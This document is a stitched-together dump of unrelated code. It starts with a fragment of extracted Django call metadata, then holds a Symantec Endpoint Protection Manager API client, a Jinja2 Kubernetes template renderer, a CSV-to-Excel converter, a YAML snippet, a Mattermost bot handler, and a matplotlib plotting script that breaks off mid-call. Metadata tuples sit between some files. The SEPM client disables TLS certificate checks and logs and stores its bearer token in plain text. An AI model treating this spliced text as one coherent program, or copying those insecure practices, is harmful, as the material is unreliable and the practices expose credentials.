content_type='application/json', status=200)\n", (3131, 3186), False, 'from django.http import HttpResponse\n'), ((4103, 4134), 'gc_apps.geo_utils.msg_util.msg', 'msg', (["('error msg: %s' % json_msg)"], {}), "('error msg: %s' % json_msg)\n", (4106, 4134), False, 'from gc_apps.geo_utils.msg_util import msg, msgt\n'), ((4150, 4217), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (4162, 4217), False, 'from django.http import HttpResponse\n'), ((4783, 4828), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (['user_msg'], {}), '(user_msg)\n', (4818, 4828), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((4844, 4911), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (4856, 4911), False, 'from django.http import HttpResponse\n'), ((5643, 5688), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (['user_msg'], {}), '(user_msg)\n', (5678, 5688), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((5704, 5771), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (5716, 5771), False, 'from django.http import HttpResponse\n'), ((6740, 6792), 'gc_apps.gis_tabular.models.TabularFileInfo.objects.get', 'TabularFileInfo.objects.get', ([], {'pk': 'tabular_file_info_id'}), '(pk=tabular_file_info_id)\n', (6767, 6792), False, 'from gc_apps.gis_tabular.models import TabularFileInfo\n'), ((7621, 7688), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (7633, 7688), False, 'from django.http import HttpResponse\n'), ((8128, 8201), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (["('Sorry! ' + worldmap_data_or_err_msg)"], {}), "('Sorry! ' + worldmap_data_or_err_msg)\n", (8163, 8201), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((8235, 8302), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (8247, 8302), False, 'from django.http import HttpResponse\n'), ((9068, 9113), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (['user_msg'], {}), '(user_msg)\n', (9103, 9113), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((9129, 9196), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (9141, 9196), False, 'from django.http import HttpResponse\n'), ((10585, 10630), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (['user_msg'], {}), '(user_msg)\n', (10620, 10630), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((10646, 10713), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (10658, 10713), False, 'from django.http import HttpResponse\n'), ((1951, 1995), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (['err_msg'], {}), '(err_msg)\n', (1986, 1995), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((2011, 2078), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (2023, 2078), False, 'from django.http import HttpResponse\n'), ((3047, 3102), 'gc_apps.geo_utils.message_helper_json.format_errors_as_text', 'format_errors_as_text', (['form_single_column'], {'for_web': '(True)'}), '(form_single_column, for_web=True)\n', (3068, 3102), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((6935, 6979), 'gc_apps.geo_utils.message_helper_json.MessageHelperJSON.get_json_fail_msg', 'MessageHelperJSON.get_json_fail_msg', (['err_msg'], {}), '(err_msg)\n', (6970, 6979), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n'), ((6995, 7062), 'django.http.HttpResponse', 'HttpResponse', (['json_msg'], {'content_type': '"""application/json"""', 'status': '(200)'}), "(json_msg, content_type='application/json', status=200)\n", (7007, 7062), False, 'from django.http import HttpResponse\n'), ((7401, 7450), 'gc_apps.geo_utils.message_helper_json.format_errors_as_text', 'format_errors_as_text', (['form_lat_lng'], {'for_web': '(True)'}), '(form_lat_lng, for_web=True)\n', (7422, 7450), False, 'from gc_apps.geo_utils.message_helper_json import MessageHelperJSON, format_errors_as_text\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
py_sep_sdk - Symantec Endpoint Protection Manager API Client Library
Copyright (C) 2019 <NAME> @greenpau
See LICENSE for licensing details
'''
from __future__ import (absolute_import, division, print_function)
import logging
import json
import requests
import urllib3
import py_sep_sdk.config as config
urllib3.disable_warnings()
class Client(object):
'''
This class implements an API client for Symantec Endpoint Protection Manager API.
'''
def __init__(self):
''' Initializes the class. '''
self.log = logging.getLogger('sepm-client')
handler = logging.StreamHandler()
formatter = logging.Formatter('[%(asctime)s] %(levelname)s %(name)s@%(lineno)d: %(message)s')
handler.setFormatter(formatter)
self.log.addHandler(handler)
self.host = None
self.debug_enabled = False
self.config = config.ClientConfiguration()
self.session = requests.Session()
self.headers = {
"Accept-Charset": "utf-8",
"Accept-Encoding": "gzip, deflate, compress",
"Accept": "*/*",
}
self.is_authenticated = False
return
def debug(self):
''' Enables debugging of the class. '''
self.log.setLevel(logging.DEBUG)
self.debug_enabled = True
self.config.log.setLevel(logging.DEBUG)
self.config.debug_enabled = True
return
def delete_agent(self, agent_id=None, fmt='json'):
if not agent_id:
raise Exception('client', 'failed to delete an agent because id is empty')
if agent_id == '':
raise Exception('client', 'failed to delete an agent because id is empty')
if len(agent_id) != 32:
raise Exception('client', 'failed to delete an agent because id is unsupported, not len(32)')
self.authenticate()
url = '%s/computers/%s' % (self.config.get('url'), agent_id.lower())
req = self.session.delete(url, headers=self.headers, verify=False)
response = {
'code': req.status_code,
}
if req.status_code == 400:
response['message'] = 'The parameters are invalid.'
elif req.status_code == 401:
response['message'] = 'The user that is currently logged on has insufficient rights to execute the web method, or the user is unauthorized.'
elif req.status_code == 410:
response['message'] = 'Cannot find the specified object.'
elif req.status_code == 500:
response['message'] = 'The web service encountered an error while processing the web request.'
elif req.status_code == 204:
response['message'] = 'The resource was deleted. If the resource did not exist prior to the call, 204 is still returned.'
else:
response['message'] = req.text
return response
def set_host(self, host):
''' Sets API server host. '''
self.host = host
return
def get_version(self):
''' Connect to API server and retrieves version information. '''
url = '%s/version' % (self.config.get('url'))
req = self.session.get(url, headers=self.headers, verify=False)
if req.status_code != 200:
raise Exception('client', 'url: %s, %s: %s' % (url, req.status_code, req.text))
data = json.loads(req.text)
manager = {}
for key in ['version', 'API_SEQUENCE', 'API_VERSION']:
if key not in data:
raise Exception('client', "key '%s' is not part of the response" % (key))
self.config.settings['manager_' + key.lower()] = str(data[key])
manager[key.lower()] = str(data[key])
return manager
def get_user_session(self):
''' Connect to API server and retrieve currest user session information. '''
if 'api_token' not in self.config.settings:
self.log.debug('api_token is not in configuration settings')
return False
self.headers['Authorization'] = 'Bearer %s' % (self.config.settings['api_token'])
self.log.debug('attempting accessing current user session with %s token' % (self.config.settings['api_token']))
url = '%s/sessions/currentuser' % (self.config.get('url'))
req = self.session.get(url, headers=self.headers, verify=False)
if req.status_code != 200:
self.log.debug('url: %s, %s: %s' % (url, req.status_code, req.text))
return False
data = json.loads(req.text)
self.log.debug('%s' % (data))
return True
def _get_items(self, item=None):
''' Perform GET requests. '''
self.authenticate()
mandatory_response_keys = [
'content',
'firstPage',
'lastPage',
'totalPages'
]
items = []
page_counter = 0
while True:
page_counter += 1
url = '%s/%s' % (self.config.get('url'), item)
params = {}
params['pageSize'] = 500
params['pageIndex'] = page_counter
self.log.debug('GET %s with params: %s', url, params)
req = self.session.get(url, headers=self.headers, params=params, verify=False)
if req.status_code != 200:
raise Exception('client',
'%d: %s, message: %s' % (req.status_code, req.reason, req.text))
data = json.loads(req.text)
if item in ['domains', 'licenses', 'admin-users']:
items.extend(data)
break
for key in mandatory_response_keys:
if key not in data:
raise Exception('client', "key '%s' is not in response" % (key))
items.extend(data['content'])
if data['lastPage'] is True:
break
if page_counter > 100:
break
response = {}
uuid = 'id'
uuid_map = {
'computers': 'agentId',
'licenses': 'serialNumber'
}
if item in uuid_map:
uuid = uuid_map[item]
for entry in items:
if uuid in entry:
for f in ['computerName', 'loginDomain', 'logonUserName', 'domainOrWorkgroup']:
if f in entry:
if isinstance(entry[f], (str, unicode)):
entry[f] = str(entry[f].encode('utf-8')).lower()
response[entry[uuid]] = entry
response = self._remove_unicode(response)
return response
def get_domains(self):
''' Get a list of domains. '''
return self._get_items('domains')
def get_groups(self):
''' Get a list of groups. '''
return self._get_items('groups')
def get_computers(self):
''' Get a list of computers. '''
return self._get_items('computers')
def get_licenses(self):
''' Get a list of licenses. '''
return self._get_items('licenses')
def get_policies(self):
''' Get a list of policies. '''
return self._get_items('policies/summary')
def get_admin_users(self):
''' Get a list of admin users. '''
return self._get_items('admin-users')
def authenticate(self):
''' Handle authentication. '''
if self.get_user_session():
self.is_authenticated = True
if not self.is_authenticated:
url = '%s/identity/authenticate' % (self.config.get('url'))
payload = {
"username": self.config.settings['username'],
"password": self.config.settings['password'],
"domain": "",
}
req = self.session.post(url, json=payload, verify=False)
if req.status_code != 200:
raise Exception('client',
'%d: %s, message: %s' % (req.status_code, req.reason, req.text))
data = json.loads(req.text)
if 'token' not in data:
raise Exception('client', 'authentication response has no token')
self.config.settings['api_token'] = str(data['token'])
for k in data:
self.config.settings['api_' + str(k)] = data[k]
self.headers['Authorization'] = 'Bearer %s' % (data['token'])
self.log.debug('writing token %s to %s' % (self.config.settings['api_token'], self.config.settings['api_token_file']))
with open(self.config.settings['api_token_file'], "w") as token_file:
token_file.write(self.config.settings['api_token'])
self.is_authenticated = True
return
def _remove_unicode(self, data):
if isinstance(data, (dict)):
new_data = {}
for k in data:
if isinstance(k, (unicode)):
new_data[str(k)] = self._remove_unicode(data[k])
continue
new_data[k] = self._remove_unicode(data[k])
return new_data
if isinstance(data, (list)):
new_data = []
for entry in data:
new_data.append(self._remove_unicode(entry))
return new_data
elif isinstance(data, (unicode)):
s = ''
try:
s = str(data)
except:
s = data.replace(u"\u2018", "'").replace(u"\u2019", "'")
return str(s)
else:
pass
return data
def new_client():
'''
Return an instance of Client.
'''
return Client()
| [
"logging.getLogger",
"json.loads",
"logging.StreamHandler",
"requests.Session",
"logging.Formatter",
"py_sep_sdk.config.ClientConfiguration",
"urllib3.disable_warnings"
] | [((356, 382), 'urllib3.disable_warnings', 'urllib3.disable_warnings', ([], {}), '()\n', (380, 382), False, 'import urllib3\n'), ((591, 623), 'logging.getLogger', 'logging.getLogger', (['"""sepm-client"""'], {}), "('sepm-client')\n", (608, 623), False, 'import logging\n'), ((642, 665), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (663, 665), False, 'import logging\n'), ((686, 772), 'logging.Formatter', 'logging.Formatter', (['"""[%(asctime)s] %(levelname)s %(name)s@%(lineno)d: %(message)s"""'], {}), "(\n '[%(asctime)s] %(levelname)s %(name)s@%(lineno)d: %(message)s')\n", (703, 772), False, 'import logging\n'), ((927, 955), 'py_sep_sdk.config.ClientConfiguration', 'config.ClientConfiguration', ([], {}), '()\n', (953, 955), True, 'import py_sep_sdk.config as config\n'), ((979, 997), 'requests.Session', 'requests.Session', ([], {}), '()\n', (995, 997), False, 'import requests\n'), ((3399, 3419), 'json.loads', 'json.loads', (['req.text'], {}), '(req.text)\n', (3409, 3419), False, 'import json\n'), ((4549, 4569), 'json.loads', 'json.loads', (['req.text'], {}), '(req.text)\n', (4559, 4569), False, 'import json\n'), ((5490, 5510), 'json.loads', 'json.loads', (['req.text'], {}), '(req.text)\n', (5500, 5510), False, 'import json\n'), ((8021, 8041), 'json.loads', 'json.loads', (['req.text'], {}), '(req.text)\n', (8031, 8041), False, 'import json\n')] |
"""
Render k8s templates from NIST format
"""
import sys
from os.path import abspath, dirname, join, normpath, isdir, isfile
from jinja2 import (Template,
Environment,
PackageLoader,
select_autoescape)
CURRENT_DIR = dirname(abspath(__file__))
# adding this path for the PackageLoader
sys.path.append(dirname(CURRENT_DIR))
#TEMPLATES_DIR = join(CURRENT_DIR, 'templates')
OUTPUT_DIR = join(CURRENT_DIR, 'output')
class TemplateRenderHelper(object):
def __init__(self, template_dict, template_name, rendered_filename):
"""execute main method"""
self.jinja_env = Environment(\
loader=PackageLoader('kube_templates', 'templates'),
autoescape=select_autoescape(['html', 'xml']))
self.render_template(template_dict,
template_name,
rendered_filename)
def render_template(self, template_dict, template_name, rendered_filename):
"""Make a simple template and write it to the otuput directory"""
assert template_dict, 'template_dict cannot be None'
template = self.jinja_env.get_template(template_name)
# create content
#
content = template.render(template_dict)
# write file out
#
rendered_filepath = join(OUTPUT_DIR, rendered_filename)
open(rendered_filepath, 'w').write(content)
print('-' * 40)
print('template written: %s' % rendered_filepath)
print('-' * 40)
if __name__ == '__main__':
tmpl_info = dict(eval_id='ravens',
path_to_dataroot='subpath_to_dataroot',
path_to_outputs='subpath_to_outputs',
command='ta3_search',
command_args='command_args')
#template_name = 'nist-orig-template.yml'
#template_name = 'ravens-template-02.yml'
template_name = 'ravens-ta2test-01.yml'
output_file = 'tworavens_ta3ta2_test_pod.yml'
trh = TemplateRenderHelper(tmpl_info,
template_name,
output_file)
| [
"os.path.join",
"os.path.dirname",
"jinja2.select_autoescape",
"os.path.abspath",
"jinja2.PackageLoader"
] | [((445, 472), 'os.path.join', 'join', (['CURRENT_DIR', '"""output"""'], {}), "(CURRENT_DIR, 'output')\n", (449, 472), False, 'from os.path import abspath, dirname, join, normpath, isdir, isfile\n'), ((285, 302), 'os.path.abspath', 'abspath', (['__file__'], {}), '(__file__)\n', (292, 302), False, 'from os.path import abspath, dirname, join, normpath, isdir, isfile\n'), ((361, 381), 'os.path.dirname', 'dirname', (['CURRENT_DIR'], {}), '(CURRENT_DIR)\n', (368, 381), False, 'from os.path import abspath, dirname, join, normpath, isdir, isfile\n'), ((1348, 1383), 'os.path.join', 'join', (['OUTPUT_DIR', 'rendered_filename'], {}), '(OUTPUT_DIR, rendered_filename)\n', (1352, 1383), False, 'from os.path import abspath, dirname, join, normpath, isdir, isfile\n'), ((676, 720), 'jinja2.PackageLoader', 'PackageLoader', (['"""kube_templates"""', '"""templates"""'], {}), "('kube_templates', 'templates')\n", (689, 720), False, 'from jinja2 import Template, Environment, PackageLoader, select_autoescape\n'), ((745, 779), 'jinja2.select_autoescape', 'select_autoescape', (["['html', 'xml']"], {}), "(['html', 'xml'])\n", (762, 779), False, 'from jinja2 import Template, Environment, PackageLoader, select_autoescape\n')] |
#!/usr/bin/env python3
import os
import sys
import argparse
import csv
import re
from dateutil import parser
import datetime
from abc import ABC, abstractmethod
import xlwt
import openpyxl
class Csv2XlsException(Exception):
pass
class ExcelWriter(ABC):
@abstractmethod
def add_sheet(self, wb, name):
pass
@abstractmethod
def append(self, ws, row):
pass
@abstractmethod
def save(self, filename):
pass
class XlsWriter(ExcelWriter):
def __init__(self):
self.wb = xlwt.Workbook()
self.row_counter = 0
def add_sheet(self, name):
self.row_counter = 0
return self.wb.add_sheet(sheetname=name)
def append(self, worksheet, row, translate_date=False):
col_counter = 0
for data in row:
excel_data = parse_data(data, translate_date)
if translate_date and type(excel_data) is datetime.datetime:
datetime_format = xlwt.XFStyle()
datetime_format.num_format_str = 'yyyy-MM-ddThh:mm:ss.000'
worksheet.write(self.row_counter, col_counter, excel_data, datetime_format)
elif translate_date and type(excel_data) is datetime.time:
time_format = xlwt.XFStyle()
time_format.num_format_str = 'hh:mm:ss.000'
worksheet.write(self.row_counter, col_counter, excel_data, time_format)
elif translate_date and type(excel_data) is datetime.date:
date_format = xlwt.XFStyle()
date_format.num_format_str = 'yyyy-MM-dd'
worksheet.write(self.row_counter, col_counter, excel_data, date_format)
else:
worksheet.write(self.row_counter, col_counter, excel_data)
col_counter += 1
self.row_counter += 1
def save(self, filename):
self.wb.save(filename)
class XlsxWriter(ExcelWriter):
def __init__(self):
self.wb = openpyxl.Workbook()
self.has_default_sheet = True
def add_sheet(self, name):
if self.has_default_sheet:
self.has_default_sheet = False
self.wb.active.title = name
return self.wb.active
return self.wb.create_sheet(title=name)
def append(self, worksheet, row, translate_date=False):
excel_row = [parse_data(data, translate_date) for data in row]
worksheet.append(excel_row)
def save(self, filename):
self.wb.save(filename)
def parse_data(data, translate_date):
try:
return float(data)
except ValueError:
pass
if translate_date:
try:
stripped_data = data.strip()
dt = parser.parse(stripped_data, ignoretz=True)
# look for time
m = re.search('\d+:[0-5][0-9](:[0-5][0-9](.\d+)?)?$', stripped_data)
if m:
(time_start_idx, time_end_idx) = m.span()
if time_start_idx == 0:
# if time start at index 0
# it means that there is only time on data
return datetime.time(dt.hour, dt.minute, dt.second, dt.microsecond)
else:
# there is time and something else (maybe date)
return datetime.datetime(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second, dt.microsecond)
else:
# no time found on date so only date
return datetime.date(dt.year, dt.month, dt.day)
return dt
except ValueError:
pass
return data
def read_csv(csv_file):
rows = []
with open(csv_file, 'r', newline='') as f:
reader = csv.reader(f)
for row in reader:
rows.append(row)
return rows
def write_excel_from_csv(excel_file, csv_files, translate_date):
dummy, file_extension = os.path.splitext(os.path.basename(excel_file))
excel_writer = XlsWriter() if file_extension == '.xls' else XlsxWriter()
for csv_file in csv_files:
sheet_name = os.path.basename(csv_file)
if sheet_name.lower().endswith('.csv'):
sheet_name = sheet_name[:-4]
rows = read_csv(csv_file)
ws = excel_writer.add_sheet(sheet_name)
for row in rows:
excel_writer.append(ws, row, translate_date)
excel_writer.save(excel_file)
def parse_arg():
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input-files',
nargs='+',
required=True,
help='input excel files')
parser.add_argument('-o', '--output-file',
required=True,
help='output excel file')
parser.add_argument('-t', '--translate-date',
action='store_true',
help='translate date string to excel date')
args = parser.parse_args()
return args
def main(argv):
try:
args = parse_arg()
write_excel_from_csv(args.output_file, args.input_files, args.translate_date)
except Exception as e:
print(e, file=sys.stderr)
exit(1)
if __name__ == "__main__":
main(sys.argv)
| [
"datetime.datetime",
"dateutil.parser.parse",
"dateutil.parser.parse_args",
"datetime.time",
"argparse.ArgumentParser",
"xlwt.XFStyle",
"dateutil.parser.add_argument",
"openpyxl.Workbook",
"csv.reader",
"os.path.basename",
"datetime.date",
"xlwt.Workbook",
"re.search"
] | [((4395, 4420), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (4418, 4420), False, 'import argparse\n'), ((4425, 4524), 'dateutil.parser.add_argument', 'parser.add_argument', (['"""-i"""', '"""--input-files"""'], {'nargs': '"""+"""', 'required': '(True)', 'help': '"""input excel files"""'}), "('-i', '--input-files', nargs='+', required=True, help=\n 'input excel files')\n", (4444, 4524), False, 'from dateutil import parser\n'), ((4596, 4684), 'dateutil.parser.add_argument', 'parser.add_argument', (['"""-o"""', '"""--output-file"""'], {'required': '(True)', 'help': '"""output excel file"""'}), "('-o', '--output-file', required=True, help=\n 'output excel file')\n", (4615, 4684), False, 'from dateutil import parser\n'), ((4732, 4847), 'dateutil.parser.add_argument', 'parser.add_argument', (['"""-t"""', '"""--translate-date"""'], {'action': '"""store_true"""', 'help': '"""translate date string to excel date"""'}), "('-t', '--translate-date', action='store_true', help=\n 'translate date string to excel date')\n", (4751, 4847), False, 'from dateutil import parser\n'), ((4903, 4922), 'dateutil.parser.parse_args', 'parser.parse_args', ([], {}), '()\n', (4920, 4922), False, 'from dateutil import parser\n'), ((536, 551), 'xlwt.Workbook', 'xlwt.Workbook', ([], {}), '()\n', (549, 551), False, 'import xlwt\n'), ((1964, 1983), 'openpyxl.Workbook', 'openpyxl.Workbook', ([], {}), '()\n', (1981, 1983), False, 'import openpyxl\n'), ((3688, 3701), 'csv.reader', 'csv.reader', (['f'], {}), '(f)\n', (3698, 3701), False, 'import csv\n'), ((3886, 3914), 'os.path.basename', 'os.path.basename', (['excel_file'], {}), '(excel_file)\n', (3902, 3914), False, 'import os\n'), ((4045, 4071), 'os.path.basename', 'os.path.basename', (['csv_file'], {}), '(csv_file)\n', (4061, 4071), False, 'import os\n'), ((2691, 2733), 'dateutil.parser.parse', 'parser.parse', (['stripped_data'], {'ignoretz': '(True)'}), '(stripped_data, ignoretz=True)\n', (2703, 2733), False, 'from dateutil import parser\n'), ((2779, 2845), 're.search', 're.search', (['"""\\\\d+:[0-5][0-9](:[0-5][0-9](.\\\\d+)?)?$"""', 'stripped_data'], {}), "('\\\\d+:[0-5][0-9](:[0-5][0-9](.\\\\d+)?)?$', stripped_data)\n", (2788, 2845), False, 'import re\n'), ((966, 980), 'xlwt.XFStyle', 'xlwt.XFStyle', ([], {}), '()\n', (978, 980), False, 'import xlwt\n'), ((3461, 3501), 'datetime.date', 'datetime.date', (['dt.year', 'dt.month', 'dt.day'], {}), '(dt.year, dt.month, dt.day)\n', (3474, 3501), False, 'import datetime\n'), ((1249, 1263), 'xlwt.XFStyle', 'xlwt.XFStyle', ([], {}), '()\n', (1261, 1263), False, 'import xlwt\n'), ((3097, 3157), 'datetime.time', 'datetime.time', (['dt.hour', 'dt.minute', 'dt.second', 'dt.microsecond'], {}), '(dt.hour, dt.minute, dt.second, dt.microsecond)\n', (3110, 3157), False, 'import datetime\n'), ((3275, 3370), 'datetime.datetime', 'datetime.datetime', (['dt.year', 'dt.month', 'dt.day', 'dt.hour', 'dt.minute', 'dt.second', 'dt.microsecond'], {}), '(dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second,\n dt.microsecond)\n', (3292, 3370), False, 'import datetime\n'), ((1513, 1527), 'xlwt.XFStyle', 'xlwt.XFStyle', ([], {}), '()\n', (1525, 1527), False, 'import xlwt\n')] |
import yaml
document = """
"name": "example_app"
"version": "1.0.0"
"main": "example_app/main.py"
"description": "A example structure for building projects cross-platform using kivy"
"license": "MIT"
"repository":
"type": "git"
"url": "<EMAIL>:VictorManhani/kivy_build.git"
"engines":
"python": "3.7.7"
"kivy": "1.11.1"
"modules":
"example_app/kivy_modules"
"""
a = yaml.load(document)
a['files'] = "hello"
print(a) | [
"yaml.load"
] | [((388, 407), 'yaml.load', 'yaml.load', (['document'], {}), '(document)\n', (397, 407), False, 'import yaml\n')] |
# -*- coding: utf-8 -*-
import re
from mattermost_bot.bot import respond_to
@respond_to('(.*) added to the channel by (.*)', re.IGNORECASE)
def added_to_channel(message, myname, channel_admin):
message.reply('Hi, %s. I am %s. Glad to join this channel :) ' % (channel_admin, myname))
added_to_channel.__doc__ = "Response when added to a channel"
| [
"mattermost_bot.bot.respond_to"
] | [((81, 143), 'mattermost_bot.bot.respond_to', 'respond_to', (['"""(.*) added to the channel by (.*)"""', 're.IGNORECASE'], {}), "('(.*) added to the channel by (.*)', re.IGNORECASE)\n", (91, 143), False, 'from mattermost_bot.bot import respond_to\n')] |
# coding=utf-8
import sys
import os
import csv
from datetime import datetime, timedelta
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.dates import drange
from matplotlib.patches import Rectangle
import scenario_factory
# http://www.javascripter.net/faq/hextorgb.htm
PRIMA = (148/256, 164/256, 182/256)
PRIMB = (101/256, 129/256, 164/256)
PRIM = ( 31/256, 74/256, 125/256)
PRIMC = ( 41/256, 65/256, 94/256)
PRIMD = ( 10/256, 42/256, 81/256)
EC = (1, 1, 1, 0)
GRAY = (0.5, 0.5, 0.5)
WHITE = (1, 1, 1)
def load(f):
with np.load(f) as npz:
data = np.array([npz[k] for k in sorted(npz.keys())])
return data
def plot_aggregated(sc, bd, unctrl, ctrl, ctrl_sched, res=1):
t_day_start = sc.t_block_start - timedelta(hours=sc.t_block_start.hour,
minutes=sc.t_block_start.minute)
t = drange(t_day_start, sc.t_end, timedelta(minutes=res))
skip = (t_day_start - sc.t_start).total_seconds() / 60 / res
i_block_start = (sc.t_block_start - t_day_start).total_seconds() / 60 / res
i_block_end = (sc.t_block_end - t_day_start).total_seconds() / 60 / res
P_el_unctrl = unctrl[:,0,skip:].sum(0)
P_el_ctrl = ctrl[:,0,skip:].sum(0)
P_el_sched = ctrl_sched[:,skip:].sum(0)
P_el_target = np.ma.array(P_el_sched)
block = np.array(sc.block)
if block.shape == (1,):
block = block.repeat(P_el_target[~P_el_target.mask].shape[0])
elif block.shape[0] == P_el_target[~P_el_target.mask].shape[0] / 15:
block = block.repeat(15)
P_el_target[~P_el_target.mask] = block
T_storage_ctrl = ctrl[:,2,skip:]
ft = np.array([t[0]] + list(np.repeat(t[1:-1], 2)) + [t[-1]])
P_el_ctrl_fill = np.repeat(P_el_ctrl[:-1], 2)
fig, ax = plt.subplots(2, sharex=True)
fig.subplots_adjust(left=0.105, right=0.998, hspace=0.3, top=0.975, bottom=0.2)
for a in ax:
plt.setp(list(a.spines.values()), color='k')
plt.setp([a.get_xticklines(), a.get_yticklines()], color='k')
ax[0].set_ylabel('P$_{\mathrm{el}}$ [kW]')
ymax = max(P_el_unctrl.max(), P_el_ctrl_fill.max(), P_el_sched.max(), 0) / 1000.0
ymin = min(P_el_unctrl.min(), P_el_ctrl_fill.min(), P_el_sched.min(), 0) / 1000.0
ax[0].set_ylim(ymin - abs(ymin * 0.1), ymax + abs(ymax * 0.1))
xspace = (t[-1] - t[-2])
# ax[0].set_xlim(t[0], t[-1] + xspace)
ax[0].set_xlim(t[0], t[len(t)/2])
# ax[0].axvline(t[i_block_start], ls='--', color='0.5')
# ax[0].axvline(t[i_block_end], ls='--', color='0.5')
ax[0].axvspan(t[i_block_start], t[i_block_end], fc=GRAY+(0.2,), ec=EC)
# ax[0].axvline(t[0], ls='-', color=GRAY, lw=0.5)
# ax[0].axvline(t[len(t)/2], ls='-', color=GRAY, lw=0.5)
l_unctrl, = ax[0].plot_date(t, P_el_unctrl / 1000.0, fmt=':', color='k', drawstyle='steps-post', lw=0.75)
l_unctrl.set_dashes([1.0, 1.0])
# add lw=0.0 due to bug in mpl (will show as hairline in pdf though...)
l_ctrl = ax[0].fill_between(ft, P_el_ctrl_fill / 1000.0, facecolors=GRAY+(0.75,), edgecolors=EC, lw=0.0)
# Create proxy artist as l_ctrl legend handle
l_ctrl_proxy = Rectangle((0, 0), 1, 1, fc=GRAY, ec=WHITE, lw=0.0, alpha=0.5)
# l_sched, = ax[0].plot_date(t, P_el_sched / 1000.0, fmt='-', color=GRAY, drawstyle='steps-post', lw=0.75)
l_target, = ax[0].plot_date(t, P_el_target / 1000.0, fmt='-', color='k', drawstyle='steps-post', lw=0.75)
# colors = [
# '#348ABD', # blue
# '#7A68A6', # purple
# '#A60628', # red
# '#467821', # green
# '#CF4457', # pink
# '#188487', # turqoise
# '#E24A33', # orange
# '#1F4A7D', # primary
# '#BF9D23', # secondary
# '#BF5B23', # complementary
# '#94A4B6', # primaryA
# '#6581A4', # primaryB
# '#29415E', # primaryC
# '#0A2A51', # primaryD
# ][:len(unctrl)]
# for (c, P_el_unctrl, P_el_ctrl, P_el_sched) in zip(colors, unctrl[:,0,:], ctrl[:,0,:], ctrl_sched):
# ax[0].plot_date(t, P_el_unctrl / 1000.0, fmt='-', color=c, lw=1, label='unctrl')
# ax[0].plot_date(t, P_el_ctrl / 1000.0, fmt=':', color=c, lw=1, label='ctrl')
# ax[0].plot_date(t, P_el_sched / 1000.0, fmt='--x', color=c, lw=1, label='sched')
ymax = T_storage_ctrl.max() - 273
ymin = T_storage_ctrl.min() - 273
ax[1].set_ylim(ymin - abs(ymin * 0.01), ymax + abs(ymax * 0.01))
ax[1].set_ylabel('T$_{\mathrm{storage}}\;[^{\circ}\mathrm{C}]$', labelpad=9)
ax[1].axvspan(t[i_block_start], t[i_block_end], fc=GRAY+(0.1,), ec=EC)
# ax[1].axvline(t[0], ls='-', color=GRAY, lw=0.5)
# ax[1].axvline(t[len(t)/2], ls='-', color=GRAY, lw=0.5)
for v in T_storage_ctrl:
ax[1].plot_date(t, v - 273.0, fmt='-', color=GRAY, alpha=0.25, lw=0.5)
# HP and CHP have different temperature ranges (HP: 40-50, CHP: 50-70)
crit = (T_storage_ctrl - 273 >= 50).all(axis=1)
T_CHP = T_storage_ctrl[crit]
T_HP = T_storage_ctrl[~crit]
l_T_med_CHP, = ax[1].plot_date(t, T_CHP.mean(0) - 273.0, fmt='-', color=GRAY, alpha=0.75, lw=1.5)
l_T_med_HP, = ax[1].plot_date(t, T_HP.mean(0) - 273.0, fmt='-', color=GRAY, alpha=0.75, lw=1.5)
ax[0].xaxis.get_major_formatter().scaled[1/24.] = '%H:%M'
ax[-1].set_xlabel('Time of day')
fig.autofmt_xdate()
ax[1].legend([l_target, l_unctrl, l_ctrl_proxy, l_T_med_CHP],
['target', 'original', 'scheduled', 'storage temperatures (mean)'],
